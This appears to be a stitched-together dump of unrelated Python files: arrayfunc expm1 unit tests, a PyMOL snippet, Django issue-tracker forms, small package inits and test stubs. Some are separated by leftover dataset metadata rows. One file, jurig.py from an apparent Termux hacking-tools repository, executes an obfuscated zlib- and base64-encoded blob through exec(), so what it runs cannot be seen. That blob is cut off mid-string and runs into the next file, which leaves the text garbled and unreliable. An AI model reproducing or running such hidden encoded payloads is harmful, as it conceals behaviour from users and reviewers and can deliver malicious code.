    def test_expm1_no_params_e1(self):
        """Test expm1 with no parameters - Array code d.
        """
        with self.assertRaises(TypeError):
            arrayfunc.expm1()
##############################################################################
##############################################################################
class expm1_nandata_exceptions_nan_f(unittest.TestCase):
"""Test for basic general function operation.
nan_data_errorchecked_noparam_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.dataout = array.array('f', itertools.repeat(0.0, 10))
self.datainf = array.array('f', [math.inf] * 10)
self.datanan = array.array('f', [math.nan] * 10)
self.dataninf = array.array('f', [-math.inf] * 10)
########################################################
def test_expm1_outputarray(self):
"""Test expm1 for data of nan with matherrors checking on and single parameter functions - Array code f.
"""
with self.assertRaises(ArithmeticError):
arrayfunc.expm1(self.datanan, self.dataout)
########################################################
def test_expm1_inplace(self):
"""Test expm1 in place for data of nan with matherrors checking on and single parameter functions - Array code f.
"""
with self.assertRaises(ArithmeticError):
arrayfunc.expm1(self.datanan)
########################################################
def test_expm1_ov_outputarray(self):
"""Test expm1 for data of nan with matherrors checking off and single parameter functions - Array code f.
"""
# Calculate the expected result.
expected = [math.expm1(x) for x in self.datanan]
# This is the actual test.
arrayfunc.expm1(self.datanan, self.dataout, matherrors=True)
for dataoutitem, expecteditem in zip(list(self.dataout), expected):
# The behaviour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_ov_inplace(self):
"""Test expm1 in place for data of nan with matherrors checking off and single parameter functions - Array code f.
"""
# Calculate the expected result.
expected = [math.expm1(x) for x in self.datanan]
# This is the actual test.
arrayfunc.expm1(self.datanan, matherrors=True)
for dataoutitem, expecteditem in zip(list(self.datanan), expected):
# The behaviour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
##############################################################################
##############################################################################
class expm1_nandata_exceptions_nan_d(unittest.TestCase):
"""Test for basic general function operation.
nan_data_errorchecked_noparam_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.dataout = array.array('d', itertools.repeat(0.0, 10))
self.datainf = array.array('d', [math.inf] * 10)
self.datanan = array.array('d', [math.nan] * 10)
self.dataninf = array.array('d', [-math.inf] * 10)
########################################################
def test_expm1_outputarray(self):
"""Test expm1 for data of nan with matherrors checking on and single parameter functions - Array code d.
"""
with self.assertRaises(ArithmeticError):
arrayfunc.expm1(self.datanan, self.dataout)
########################################################
def test_expm1_inplace(self):
"""Test expm1 in place for data of nan with matherrors checking on and single parameter functions - Array code d.
"""
with self.assertRaises(ArithmeticError):
arrayfunc.expm1(self.datanan)
########################################################
def test_expm1_ov_outputarray(self):
"""Test expm1 for data of nan with matherrors checking off and single parameter functions - Array code d.
"""
# Calculate the expected result.
expected = [math.expm1(x) for x in self.datanan]
# This is the actual test.
arrayfunc.expm1(self.datanan, self.dataout, matherrors=True)
for dataoutitem, expecteditem in zip(list(self.dataout), expected):
# The behaviour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_ov_inplace(self):
"""Test expm1 in place for data of nan with matherrors checking off and single parameter functions - Array code d.
"""
# Calculate the expected result.
expected = [math.expm1(x) for x in self.datanan]
# This is the actual test.
arrayfunc.expm1(self.datanan, matherrors=True)
for dataoutitem, expecteditem in zip(list(self.datanan), expected):
# The behaviour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
##############################################################################
##############################################################################
class expm1_nandata_exceptions_inf_f(unittest.TestCase):
"""Test for basic general function operation.
nan_data_error_noparam_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.dataout = array.array('f', itertools.repeat(0.0, 10))
self.datainf = array.array('f', [math.inf] * 10)
self.datanan = array.array('f', [math.nan] * 10)
self.dataninf = array.array('f', [-math.inf] * 10)
########################################################
def test_expm1_outputarray(self):
"""Test expm1 for data of inf with matherrors checking on and single parameter functions - Array code f.
"""
with self.assertRaises(ArithmeticError):
arrayfunc.expm1(self.datainf, self.dataout)
########################################################
def test_expm1_inplace(self):
"""Test expm1 in place for data of inf with matherrors checking on and single parameter functions - Array code f.
"""
with self.assertRaises(ArithmeticError):
arrayfunc.expm1(self.datainf)
########################################################
def test_expm1_ov_outputarray(self):
"""Test expm1 for data of inf with matherrors checking off and single parameter functions - Array code f.
"""
# This is the actual test.
arrayfunc.expm1(self.datainf, self.dataout, matherrors=True)
########################################################
def test_expm1_ov_inplace(self):
"""Test expm1 in place for data of inf with matherrors checking off and single parameter functions - Array code f.
"""
# This is the actual test.
arrayfunc.expm1(self.datainf, matherrors=True)
##############################################################################
##############################################################################
class expm1_nandata_exceptions_inf_d(unittest.TestCase):
"""Test for basic general function operation.
nan_data_error_noparam_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.dataout = array.array('d', itertools.repeat(0.0, 10))
self.datainf = array.array('d', [math.inf] * 10)
self.datanan = array.array('d', [math.nan] * 10)
self.dataninf = array.array('d', [-math.inf] * 10)
########################################################
def test_expm1_outputarray(self):
"""Test expm1 for data of inf with matherrors checking on and single parameter functions - Array code d.
"""
with self.assertRaises(ArithmeticError):
arrayfunc.expm1(self.datainf, self.dataout)
########################################################
def test_expm1_inplace(self):
"""Test expm1 in place for data of inf with matherrors checking on and single parameter functions - Array code d.
"""
with self.assertRaises(ArithmeticError):
arrayfunc.expm1(self.datainf)
########################################################
def test_expm1_ov_outputarray(self):
"""Test expm1 for data of inf with matherrors checking off and single parameter functions - Array code d.
"""
# This is the actual test.
arrayfunc.expm1(self.datainf, self.dataout, matherrors=True)
########################################################
def test_expm1_ov_inplace(self):
"""Test expm1 in place for data of inf with matherrors checking off and single parameter functions - Array code d.
"""
# This is the actual test.
arrayfunc.expm1(self.datainf, matherrors=True)
##############################################################################
##############################################################################
class expm1_nandata_errorchecked_ninf_f(unittest.TestCase):
"""Test for basic general function operation.
nan_data_noerror_noparam_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.dataout = array.array('f', itertools.repeat(0.0, 10))
self.datainf = array.array('f', [math.inf] * 10)
self.datanan = array.array('f', [math.nan] * 10)
self.dataninf = array.array('f', [-math.inf] * 10)
########################################################
def test_expm1_outputarray(self):
"""Test expm1 for data of -inf with matherrors checking on and single parameter functions - Array code f.
"""
# Calculate the expected result.
expected = [math.expm1(x) for x in self.dataninf]
# This is the actual test.
arrayfunc.expm1(self.dataninf, self.dataout)
for dataoutitem, expecteditem in zip(list(self.dataout), expected):
# The behaviour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_inplace(self):
"""Test expm1 in place for data of -inf with matherrors checking on and single parameter functions - Array code f.
"""
# Calculate the expected result.
expected = [math.expm1(x) for x in self.dataninf]
# This is the actual test.
arrayfunc.expm1(self.dataninf)
for dataoutitem, expecteditem in zip(list(self.dataninf), expected):
# The behaviour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_ov_outputarray(self):
"""Test expm1 for data of -inf with matherrors checking off and single parameter functions - Array code f.
"""
# Calculate the expected result.
expected = [math.expm1(x) for x in self.dataninf]
# This is the actual test.
arrayfunc.expm1(self.dataninf, self.dataout, matherrors=True)
for dataoutitem, expecteditem in zip(list(self.dataout), expected):
# The behaviour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_ov_inplace(self):
"""Test expm1 in place for data of -inf with matherrors checking off and single parameter functions - Array code f.
"""
# Calculate the expected result.
expected = [math.expm1(x) for x in self.dataninf]
# This is the actual test.
arrayfunc.expm1(self.dataninf, matherrors=True)
for dataoutitem, expecteditem in zip(list(self.dataninf), expected):
# The behaviour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
##############################################################################
##############################################################################
class expm1_nandata_errorchecked_ninf_d(unittest.TestCase):
"""Test for basic general function operation.
nan_data_noerror_noparam_template
"""
##############################################################################
def FloatassertEqual(self, expecteditem, dataoutitem, msg=None):
"""This function is patched into assertEqual to allow testing for
the floating point special values NaN, Inf, and -Inf.
"""
# NaN cannot be compared using normal means.
if math.isnan(dataoutitem) and math.isnan(expecteditem):
pass
# Anything else can be compared normally.
else:
if not math.isclose(expecteditem, dataoutitem, rel_tol=0.01, abs_tol=0.0):
raise self.failureException('%0.3f != %0.3f' % (expecteditem, dataoutitem))
########################################################
def setUp(self):
"""Initialise.
"""
self.addTypeEqualityFunc(float, self.FloatassertEqual)
self.dataout = array.array('d', itertools.repeat(0.0, 10))
self.datainf = array.array('d', [math.inf] * 10)
self.datanan = array.array('d', [math.nan] * 10)
self.dataninf = array.array('d', [-math.inf] * 10)
########################################################
def test_expm1_outputarray(self):
"""Test expm1 for data of -inf with matherrors checking on and single parameter functions - Array code d.
"""
# Calculate the expected result.
expected = [math.expm1(x) for x in self.dataninf]
# This is the actual test.
arrayfunc.expm1(self.dataninf, self.dataout)
for dataoutitem, expecteditem in zip(list(self.dataout), expected):
# The behaviour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_inplace(self):
"""Test expm1 in place for data of -inf with matherrors checking on and single parameter functions - Array code d.
"""
# Calculate the expected result.
expected = [math.expm1(x) for x in self.dataninf]
# This is the actual test.
arrayfunc.expm1(self.dataninf)
for dataoutitem, expecteditem in zip(list(self.dataninf), expected):
# The behaviour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_ov_outputarray(self):
"""Test expm1 for data of -inf with matherrors checking off and single parameter functions - Array code d.
"""
# Calculate the expected result.
expected = [math.expm1(x) for x in self.dataninf]
# This is the actual test.
arrayfunc.expm1(self.dataninf, self.dataout, matherrors=True)
for dataoutitem, expecteditem in zip(list(self.dataout), expected):
# The behaviour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
########################################################
def test_expm1_ov_inplace(self):
"""Test expm1 in place for data of -inf with matherrors checking off and single parameter functions - Array code d.
"""
# Calculate the expected result.
expected = [math.expm1(x) for x in self.dataninf]
# This is the actual test.
arrayfunc.expm1(self.dataninf, matherrors=True)
for dataoutitem, expecteditem in zip(list(self.dataninf), expected):
# The behaviour of assertEqual is modified by addTypeEqualityFunc.
self.assertEqual(dataoutitem, expecteditem)
##############################################################################
##############################################################################
if __name__ == '__main__':
# Check to see if the log file option has been selected. This option was
# added in order to decide where the results should be written.
if '-l' in sys.argv:
# Remove the option from the argument list so that "unittest" does
# not complain about unknown options.
sys.argv.remove('-l')
with open('af_unittest.txt', 'a') as f:
f.write('\n\n')
f.write('expm1\n\n')
trun = unittest.TextTestRunner(f)
unittest.main(testRunner=trun)
else:
unittest.main()
##############################################################################
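The `__main__` block above passes an open file handle to `unittest.TextTestRunner`, which accepts any writable stream. The following self-contained sketch (the `_Demo` test case is made up purely for illustration) exercises the same pattern against an in-memory buffer instead of a file:

```python
import io
import unittest

class _Demo(unittest.TestCase):
    """Tiny stand-in test case (hypothetical, for illustration only)."""
    def test_ok(self):
        self.assertEqual(1 + 1, 2)

# TextTestRunner writes its dots and summary to whatever stream it is given,
# which is what the '-l' branch above relies on with an open file handle.
stream = io.StringIO()
runner = unittest.TextTestRunner(stream)
result = runner.run(unittest.defaultTestLoader.loadTestsFromTestCase(_Demo))
```

After the run, `result.wasSuccessful()` is true and the buffer holds the usual text summary.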
# --- Programming/printNamesCoordinates.py (MooersLab/jupyterlabpymolpysnipsplus, MIT) ---
# Description: Print the atom names as tuples and coordinates of the atoms in a residue as a list.
# Source: https://www.pymolwiki.org/index.php/Sync
"""
cmd.do('stored.coords = []; iterate_state 1, (resi ${1:101}), stored.coords.append([x,y,z]); ')
cmd.do('stored.names = []; iterate_state 1, (resi ${1:101}), stored.names.append([name]);')
cmd.do('stored.names3 = [tuple(i) for i in stored.names];')
cmd.do('[print(i,j) for i,j in(zip(stored.names3, stored.coords)];')
"""
cmd.do('stored.coords = []; iterate_state 1, (resi 101), stored.coords.append([x,y,z]); ')
cmd.do('stored.names = []; iterate_state 1, (resi 101), stored.names.append([name]);')
cmd.do('stored.names3 = [tuple(i) for i in stored.names];')
cmd.do('[print(i,j) for i,j in zip(stored.names3, stored.coords)];')
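The commands above pair one-element name lists with coordinate triples. A plain-Python sketch of that pairing, using made-up atom data and requiring no PyMOL session:

```python
# iterate_state appends one-element name lists and [x, y, z] triples;
# the names are converted to tuples and zipped with the coordinates.
# The atom names and coordinates below are invented for illustration.
names = [['N'], ['CA'], ['C']]
coords = [[27.3, 8.8, 1.2], [26.1, 9.9, 1.0], [24.8, 9.2, 0.7]]

names3 = [tuple(i) for i in names]
pairs = list(zip(names3, coords))
for name, xyz in pairs:
    print(name, xyz)
```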
# --- src/services/misc/__init__.py (Fom123/fastapi-project, MIT) ---
from .schemas import (
User,
DefaultResponse,
TestResponse,
Product,
SimpleResponse,
Token,
TokenData,
)
__all__ = (
"User",
"DefaultResponse",
"TestResponse",
"Product",
"SimpleResponse",
"Token",
"TokenData",
)
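The `__all__` tuple above controls what `from ... import *` re-exports. A minimal sketch of that effect, using a throwaway stand-in module (the name `demo_schemas` and its attributes are invented for illustration):

```python
import sys
import types

# Build a throwaway module object and register it so it can be star-imported.
mod = types.ModuleType("demo_schemas")
mod.User = "User"
mod.internal_helper = "hidden"
mod.__all__ = ["User"]
sys.modules["demo_schemas"] = mod

# Star-import into a fresh namespace: only names listed in __all__ are copied.
ns = {}
exec("from demo_schemas import *", ns)
```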
# --- tacotron2/vocoders/__init__.py (alexeykarnachev/tacotron2, BSD-3-Clause) ---
from tacotron2.vocoders.waveglow import WaveGlow
from tacotron2.vocoders.waveflow import WaveFlow
# --- issue_tracker_root/issues/forms.py (efefre/issue_tracker, MIT) ---
from django import forms
from .models import Project, Issue, Attachment, Comment
from django.forms.models import inlineformset_factory
class AddProjectForm(forms.ModelForm):
class Meta:
model = Project
fields = ("name", "slug", "status")
widgets = {
"name": forms.TextInput(
attrs={"class": "form-control", "placeholder": "Enter project name"}
),
"slug": forms.TextInput(
attrs={
"class": "form-control",
"placeholder": "Enter slug (only letters)",
}
),
"status": forms.Select(attrs={"class": "form-control"}),
}
class EditProjectForm(forms.ModelForm):
class Meta:
model = Project
fields = ("name", "slug", "status")
widgets = {
"name": forms.TextInput(
attrs={"class": "form-control", "placeholder": "Enter project name"}
),
"slug": forms.TextInput(
attrs={
"class": "form-control",
"placeholder": "Enter slug (only letters)",
}
),
"status": forms.Select(attrs={"class": "form-control"}),
}
class AddIssueForm(forms.ModelForm):
class Meta:
model = Issue
fields = (
"summary",
"status",
"type",
"priority",
"assignee",
"description",
"environment",
)
widgets = {
"summary": forms.TextInput(
attrs={"class": "form-control", "placeholder": "Enter summary"}
),
"description": forms.Textarea(
attrs={"class": "form-control", "placeholder": "Description"}
),
"status": forms.Select(attrs={"class": "form-control"}),
"type": forms.Select(attrs={"class": "form-control"}),
"priority": forms.Select(attrs={"class": "form-control"}),
"assignee": forms.Select(attrs={"class": "form-control"}),
"environment": forms.Select(attrs={"class": "form-control"}),
}
class EditIssueForm(forms.ModelForm):
class Meta:
model = Issue
fields = (
"summary",
"status",
"type",
"priority",
"assignee",
"description",
"environment",
)
widgets = {
"summary": forms.TextInput(
attrs={"class": "form-control", "placeholder": "Enter summary"}
),
"description": forms.Textarea(
attrs={"class": "form-control", "placeholder": "Description"}
),
"status": forms.Select(attrs={"class": "form-control"}),
"type": forms.Select(attrs={"class": "form-control"}),
"priority": forms.Select(attrs={"class": "form-control"}),
"assignee": forms.Select(attrs={"class": "form-control"}),
"environment": forms.Select(attrs={"class": "form-control"}),
}
class AddAttachmentForm(forms.ModelForm):
class Meta:
model = Attachment
exclude = ()
AttachmentFormset = inlineformset_factory(
Issue,
Attachment,
form=AddAttachmentForm,
fields=["file",],
extra=1,
can_delete=True,
)
class AddCommentForm(forms.ModelForm):
class Meta:
model = Comment
fields = ("text",)
widgets = {
"text": forms.Textarea(
attrs={"class": "form-control", "placeholder": "Your comment..."}
)
}
class EditCommentForm(forms.ModelForm):
class Meta:
model = Comment
fields = ("text",)
widgets = {
"text": forms.Textarea(
attrs={"class": "form-control", "placeholder": "Your comment..."}
)
}
# --- jurig.py (Zusyaku/Termux-And-Lali-Linux-V2, Apache-2.0) ---
import marshal, zlib, base64
exec(zlib.decompress(base64.b64decode("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 | 85 | py | Python | tests/test_version.py | Kludex/stream-csv | 44c737be9ae8b21254be253e4772618f465d3740 | [
"MIT"
] | null | null | null | tests/test_version.py | Kludex/stream-csv | 44c737be9ae8b21254be253e4772618f465d3740 | [
"MIT"
] | null | null | null | tests/test_version.py | Kludex/stream-csv | 44c737be9ae8b21254be253e4772618f465d3740 | [
"MIT"
] | null | null | null | import stream_csv
def test_version():
assert stream_csv.__version__ == "0.1.0"
| 14.166667 | 44 | 0.717647 | 13 | 85 | 4.153846 | 0.692308 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.042254 | 0.164706 | 85 | 5 | 45 | 17 | 0.71831 | 0 | 0 | 0 | 0 | 0 | 0.058824 | 0 | 0 | 0 | 0 | 0 | 0.333333 | 1 | 0.333333 | true | 0 | 0.333333 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
301058ef64c36d61b09d02530bb0393c6927f72a | 42,659 | py | Python | tests/unit/python/fledge/services/core/api/plugins/test_update.py | DDC-NDRS/fledge-iot_fledge | 27a5e66a55daaab1aca14ce6e66f9f1e6efaef51 | [
"Apache-2.0"
] | 69 | 2019-12-03T17:54:33.000Z | 2022-03-13T07:05:23.000Z | tests/unit/python/fledge/services/core/api/plugins/test_update.py | DDC-NDRS/fledge-iot_fledge | 27a5e66a55daaab1aca14ce6e66f9f1e6efaef51 | [
"Apache-2.0"
] | 125 | 2020-02-13T15:11:28.000Z | 2022-03-29T14:42:36.000Z | tests/unit/python/fledge/services/core/api/plugins/test_update.py | DDC-NDRS/fledge-iot_fledge | 27a5e66a55daaab1aca14ce6e66f9f1e6efaef51 | [
"Apache-2.0"
] | 24 | 2019-12-27T07:48:45.000Z | 2022-03-13T07:05:28.000Z | # -*- coding: utf-8 -*-
# FLEDGE_BEGIN
# See: http://fledge-iot.readthedocs.io/
# FLEDGE_END
import json
import uuid
from unittest.mock import patch, MagicMock
import pytest
import sys
import asyncio
from aiohttp import web
from fledge.services.core import routes
from fledge.services.core import server
from fledge.services.core import connect
from fledge.services.core.api.plugins import update as plugins_update
from fledge.services.core.api.plugins.exceptions import *
from fledge.services.core.scheduler.scheduler import Scheduler
from fledge.common.storage_client.storage_client import StorageClientAsync
from fledge.common.plugin_discovery import PluginDiscovery
from fledge.common.configuration_manager import ConfigurationManager
__author__ = "Ashish Jabble"
__copyright__ = "Copyright (c) 2020 Dianomic Systems Inc."
__license__ = "Apache 2.0"
__version__ = "${VERSION}"
@pytest.allure.feature("unit")
@pytest.allure.story("api", "plugins", "update")
class TestPluginUpdate:
@pytest.fixture
def client(self, loop, test_client):
app = web.Application(loop=loop)
# fill the routes table
routes.setup(app)
return loop.run_until_complete(test_client(app))
@pytest.mark.parametrize("param", [
"blah",
1,
"notificationDelivery"
"notificationRule"
])
async def test_bad_type_plugin(self, client, param):
resp = await client.put('/fledge/plugins/{}/name/update'.format(param), data=None)
assert 400 == resp.status
assert "Invalid plugin type. Must be one of 'south' , north', 'filter', 'notify' or 'rule'" == resp.reason
